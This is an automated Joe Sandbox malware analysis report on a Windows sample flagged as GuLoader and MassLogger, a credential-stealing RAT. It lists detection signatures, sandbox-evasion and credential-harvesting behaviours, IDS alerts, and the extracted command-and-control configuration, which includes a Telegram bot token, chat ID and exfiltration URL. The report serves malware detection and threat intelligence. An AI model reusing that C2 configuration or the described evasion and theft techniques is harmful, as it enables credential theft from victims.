Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4NG0guPiKA.exe

Overview

General Information

Sample name:4NG0guPiKA.exe
renamed because original name is a hash value
Original sample name:ec0c8d7a3312e95aa25f0ce8dd738ed1660246374f6a6d1a268b97ae4d3c4d47.exe
Analysis ID:1588607
MD5:8f02b3e31021d64ed25a599e58bc8f2f
SHA1:7bec44b33d33f11de7f626097b70758f60f655f5
SHA256:ec0c8d7a3312e95aa25f0ce8dd738ed1660246374f6a6d1a268b97ae4d3c4d47
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 4NG0guPiKA.exe (PID: 7912 cmdline: "C:\Users\user\Desktop\4NG0guPiKA.exe" MD5: 8F02B3E31021D64ED25A599E58BC8F2F)
    • 4NG0guPiKA.exe (PID: 8156 cmdline: "C:\Users\user\Desktop\4NG0guPiKA.exe" MD5: 8F02B3E31021D64ED25A599E58BC8F2F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s", "Telegram Chatid": "2065242915"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1571921135.000000000347E000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: 4NG0guPiKA.exe PID: 8156JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T03:05:37.704410+010020577441Malware Command and Control Activity Detected192.168.2.1049712149.154.167.220443TCP
            2025-01-11T03:05:41.624698+010020577441Malware Command and Control Activity Detected192.168.2.1049714149.154.167.220443TCP
            2025-01-11T03:05:45.406336+010020577441Malware Command and Control Activity Detected192.168.2.1049716149.154.167.220443TCP
            2025-01-11T03:05:52.013161+010020577441Malware Command and Control Activity Detected192.168.2.1049720149.154.167.220443TCP
            2025-01-11T03:05:54.865177+010020577441Malware Command and Control Activity Detected192.168.2.1049722149.154.167.220443TCP
            2025-01-11T03:06:02.377370+010020577441Malware Command and Control Activity Detected192.168.2.1049725149.154.167.220443TCP
            2025-01-11T03:06:12.529577+010020577441Malware Command and Control Activity Detected192.168.2.1049728149.154.167.220443TCP
            2025-01-11T03:06:15.965935+010020577441Malware Command and Control Activity Detected192.168.2.1049730149.154.167.220443TCP
            2025-01-11T03:06:17.832210+010020577441Malware Command and Control Activity Detected192.168.2.1049732149.154.167.220443TCP
            2025-01-11T03:06:19.535991+010020577441Malware Command and Control Activity Detected192.168.2.1049734149.154.167.220443TCP
            2025-01-11T03:06:21.431724+010020577441Malware Command and Control Activity Detected192.168.2.1049736149.154.167.220443TCP
            2025-01-11T03:06:23.238549+010020577441Malware Command and Control Activity Detected192.168.2.1049738149.154.167.220443TCP
            2025-01-11T03:06:24.909136+010020577441Malware Command and Control Activity Detected192.168.2.1049740149.154.167.220443TCP
            2025-01-11T03:06:26.624961+010020577441Malware Command and Control Activity Detected192.168.2.1049742149.154.167.220443TCP
            2025-01-11T03:06:28.276828+010020577441Malware Command and Control Activity Detected192.168.2.1049744149.154.167.220443TCP
            2025-01-11T03:06:29.999996+010020577441Malware Command and Control Activity Detected192.168.2.1049746149.154.167.220443TCP
            2025-01-11T03:06:31.750830+010020577441Malware Command and Control Activity Detected192.168.2.1049748149.154.167.220443TCP
            2025-01-11T03:06:33.431948+010020577441Malware Command and Control Activity Detected192.168.2.1049750149.154.167.220443TCP
            2025-01-11T03:06:35.151286+010020577441Malware Command and Control Activity Detected192.168.2.1049752149.154.167.220443TCP
            2025-01-11T03:06:36.876519+010020577441Malware Command and Control Activity Detected192.168.2.1049754149.154.167.220443TCP
            2025-01-11T03:06:39.032361+010020577441Malware Command and Control Activity Detected192.168.2.1049756149.154.167.220443TCP
            2025-01-11T03:06:40.757522+010020577441Malware Command and Control Activity Detected192.168.2.1049758149.154.167.220443TCP
            2025-01-11T03:06:42.413636+010020577441Malware Command and Control Activity Detected192.168.2.1049760149.154.167.220443TCP
            2025-01-11T03:06:44.177514+010020577441Malware Command and Control Activity Detected192.168.2.1049762149.154.167.220443TCP
            2025-01-11T03:06:46.849067+010020577441Malware Command and Control Activity Detected192.168.2.1049764149.154.167.220443TCP
            2025-01-11T03:06:48.866226+010020577441Malware Command and Control Activity Detected192.168.2.1049766149.154.167.220443TCP
            2025-01-11T03:06:50.701288+010020577441Malware Command and Control Activity Detected192.168.2.1049768149.154.167.220443TCP
            2025-01-11T03:06:52.402052+010020577441Malware Command and Control Activity Detected192.168.2.1049770149.154.167.220443TCP
            2025-01-11T03:06:54.047819+010020577441Malware Command and Control Activity Detected192.168.2.1049772149.154.167.220443TCP
            2025-01-11T03:06:55.991776+010020577441Malware Command and Control Activity Detected192.168.2.1049774149.154.167.220443TCP
            2025-01-11T03:06:57.713812+010020577441Malware Command and Control Activity Detected192.168.2.1049776149.154.167.220443TCP
            2025-01-11T03:06:59.524787+010020577441Malware Command and Control Activity Detected192.168.2.1049778149.154.167.220443TCP
            2025-01-11T03:07:01.457769+010020577441Malware Command and Control Activity Detected192.168.2.1049780149.154.167.220443TCP
            2025-01-11T03:07:03.214933+010020577441Malware Command and Control Activity Detected192.168.2.1049782149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T03:05:28.438391+010028032742Potentially Bad Traffic192.168.2.1049710132.226.8.16980TCP
            2025-01-11T03:05:35.297783+010028032742Potentially Bad Traffic192.168.2.1049710132.226.8.16980TCP
            2025-01-11T03:05:40.844817+010028032742Potentially Bad Traffic192.168.2.1049713132.226.8.16980TCP
            2025-01-11T03:06:11.751087+010028032742Potentially Bad Traffic192.168.2.1049727132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T03:05:23.278926+010028032702Potentially Bad Traffic192.168.2.1049708142.250.181.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-11T03:05:35.915509+010018100081Potentially Bad Traffic192.168.2.1049712149.154.167.220443TCP
            2025-01-11T03:05:41.443058+010018100081Potentially Bad Traffic192.168.2.1049714149.154.167.220443TCP
            2025-01-11T03:05:45.159302+010018100081Potentially Bad Traffic192.168.2.1049716149.154.167.220443TCP
            2025-01-11T03:05:51.763518+010018100081Potentially Bad Traffic192.168.2.1049720149.154.167.220443TCP
            2025-01-11T03:05:54.618271+010018100081Potentially Bad Traffic192.168.2.1049722149.154.167.220443TCP
            2025-01-11T03:06:02.200710+010018100081Potentially Bad Traffic192.168.2.1049725149.154.167.220443TCP
            2025-01-11T03:06:12.354997+010018100081Potentially Bad Traffic192.168.2.1049728149.154.167.220443TCP
            2025-01-11T03:06:15.719575+010018100081Potentially Bad Traffic192.168.2.1049730149.154.167.220443TCP
            2025-01-11T03:06:17.658282+010018100081Potentially Bad Traffic192.168.2.1049732149.154.167.220443TCP
            2025-01-11T03:06:19.289507+010018100081Potentially Bad Traffic192.168.2.1049734149.154.167.220443TCP
            2025-01-11T03:06:21.119452+010018100081Potentially Bad Traffic192.168.2.1049736149.154.167.220443TCP
            2025-01-11T03:06:22.988605+010018100081Potentially Bad Traffic192.168.2.1049738149.154.167.220443TCP
            2025-01-11T03:06:24.736208+010018100081Potentially Bad Traffic192.168.2.1049740149.154.167.220443TCP
            2025-01-11T03:06:26.374032+010018100081Potentially Bad Traffic192.168.2.1049742149.154.167.220443TCP
            2025-01-11T03:06:28.100460+010018100081Potentially Bad Traffic192.168.2.1049744149.154.167.220443TCP
            2025-01-11T03:06:29.820597+010018100081Potentially Bad Traffic192.168.2.1049746149.154.167.220443TCP
            2025-01-11T03:06:31.576717+010018100081Potentially Bad Traffic192.168.2.1049748149.154.167.220443TCP
            2025-01-11T03:06:33.254475+010018100081Potentially Bad Traffic192.168.2.1049750149.154.167.220443TCP
            2025-01-11T03:06:34.901388+010018100081Potentially Bad Traffic192.168.2.1049752149.154.167.220443TCP
            2025-01-11T03:06:36.703013+010018100081Potentially Bad Traffic192.168.2.1049754149.154.167.220443TCP
            2025-01-11T03:06:38.859785+010018100081Potentially Bad Traffic192.168.2.1049756149.154.167.220443TCP
            2025-01-11T03:06:40.493302+010018100081Potentially Bad Traffic192.168.2.1049758149.154.167.220443TCP
            2025-01-11T03:06:42.236480+010018100081Potentially Bad Traffic192.168.2.1049760149.154.167.220443TCP
            2025-01-11T03:06:43.906128+010018100081Potentially Bad Traffic192.168.2.1049762149.154.167.220443TCP
            2025-01-11T03:06:46.671836+010018100081Potentially Bad Traffic192.168.2.1049764149.154.167.220443TCP
            2025-01-11T03:06:48.612707+010018100081Potentially Bad Traffic192.168.2.1049766149.154.167.220443TCP
            2025-01-11T03:06:50.439435+010018100081Potentially Bad Traffic192.168.2.1049768149.154.167.220443TCP
            2025-01-11T03:06:52.156184+010018100081Potentially Bad Traffic192.168.2.1049770149.154.167.220443TCP
            2025-01-11T03:06:53.871628+010018100081Potentially Bad Traffic192.168.2.1049772149.154.167.220443TCP
            2025-01-11T03:06:55.817470+010018100081Potentially Bad Traffic192.168.2.1049774149.154.167.220443TCP
            2025-01-11T03:06:57.463427+010018100081Potentially Bad Traffic192.168.2.1049776149.154.167.220443TCP
            2025-01-11T03:06:59.268236+010018100081Potentially Bad Traffic192.168.2.1049778149.154.167.220443TCP
            2025-01-11T03:07:01.199872+010018100081Potentially Bad Traffic192.168.2.1049780149.154.167.220443TCP
            2025-01-11T03:07:02.957766+010018100081Potentially Bad Traffic192.168.2.1049782149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: 4NG0guPiKA.exeAvira: detected
            Found malware configuration
            Source: 00000003.00000002.2646464794.000000003326B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s", "Telegram Chatid": "2065242915"}
            Source: 4NG0guPiKA.exe.8156.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendMessage"}
            Multi AV Scanner detection for submitted file
            Source: 4NG0guPiKA.exeVirustotal: Detection: 76%Perma Link
            Source: 4NG0guPiKA.exeReversingLabs: Detection: 63%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331ED1EC CryptUnprotectData,3_2_331ED1EC
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_331ED9D9 CryptUnprotectData,3_2_331ED9D9
            Source: 4NG0guPiKA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49711 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.10:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.10:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49712 version: TLS 1.2
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_00402770 FindFirstFileW,3_2_00402770
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405772
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 3_2_0040622D FindFirstFileW,FindClose,3_2_0040622D
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\Desktop\4NG0guPiKA.exeJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Local\Temp\nst6786.tmpJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Jaskendes.Tin19Jump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Skankeben.PriJump to behavior
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331E0671h3_2_331E03AF
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EC985h3_2_331EC638
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331E1042h3_2_331E0C28
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EE5F0h3_2_331EE339
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EEEA0h3_2_331EEBF7
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EDD40h3_2_331EDA89
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EBBE9h3_2_331EB944
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EC499h3_2_331EC1F2
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EF2F8h3_2_331EF042
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EB339h3_2_331EB07F
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331E1042h3_2_331E0F6F
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EEA48h3_2_331EE790
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EE198h3_2_331EDEE1
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EC041h3_2_331EBD88
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331E1042h3_2_331E0C1A
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 331EB791h3_2_331EB4EC
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then push 00000000h3_2_35F2BDF0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F2882Dh3_2_35F28650
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F291B7h3_2_35F28650
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F25058h3_2_35F24DB0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F22808h3_2_35F22560
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F27770h3_2_35F274C8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F21F58h3_2_35F21CB0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F26EC0h3_2_35F26C18
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F216A8h3_2_35F21400
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F26A68h3_2_35F267C0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F21250h3_2_35F20FA8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F24218h3_2_35F23F70
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F261B8h3_2_35F25F10
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F23968h3_2_35F236C0
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F25908h3_2_35F25660
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F230B8h3_2_35F22E10
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F22C60h3_2_35F229B8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F223B0h3_2_35F22108
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F27318h3_2_35F27070
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F21B00h3_2_35F21858
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F24ACAh3_2_35F24820
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F24670h3_2_35F243C8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F26610h3_2_35F26368
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_35F27B4F
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F23DC0h3_2_35F23B18
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F25D60h3_2_35F25AB8
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F23510h3_2_35F23268
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then jmp 35F254B0h3_2_35F25208
            Source: C:\Users\user\Desktop\4NG0guPiKA.exeCode function: 4x nop then push 00000000h3_2_3645E8A8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49722 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49734 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49722 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49746 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49774 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49734 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49746 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49774 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49758 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49730 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49712 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49712 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49730 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49760 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49740 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49768 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49762 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49740 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49776 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49768 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49744 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49762 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49716 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49772 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49716 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49744 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49772 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49714 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49758 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49714 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49760 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49728 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49720 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49780 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49776 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49728 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49720 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49780 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49736 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49725 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49736 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49725 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49754 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49732 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49754 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49732 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49752 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49750 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49752 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49750 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49738 -> 149.154.167.220:443
